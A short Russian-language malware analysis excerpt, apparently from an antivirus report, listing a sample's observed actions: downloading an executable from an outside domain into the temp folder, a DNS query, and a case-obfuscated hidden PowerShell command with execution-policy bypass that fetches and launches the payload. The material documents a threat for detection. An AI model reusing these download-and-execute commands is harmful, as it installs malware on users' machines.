Техническая информация
- http://felicitari360.ro/images/fresh/mi2.exe как %temp%\\yame.exe
- '<SYSTEM32>\cmd.exe' /c PoWErSHeLL.eXe -WInDOwSTYlE hIddeN -nOPRoFIlE -execUTioNpOLICY BYpaSS (NEW-ObJECT SYStEM.Net.WEBCLiENT).DOWNLOaDFile('http://felicitari360.ro/images/fresh/mi2.exe','%TEMP%\\yame.exe') & %TEM...
- DNS ASK fe####tari360.ro
- '<SYSTEM32>\cmd.exe' /c PoWErSHeLL.eXe -WInDOwSTYlE hIddeN -nOPRoFIlE -execUTioNpOLICY BYpaSS (NEW-ObJECT SYStEM.Net.WEBCLiENT).DOWNLOaDFile('http://felicitari360.ro/images/fresh/mi2.exe','%TEMP%\\yame.exe') & %TEM...' (со скрытым окном)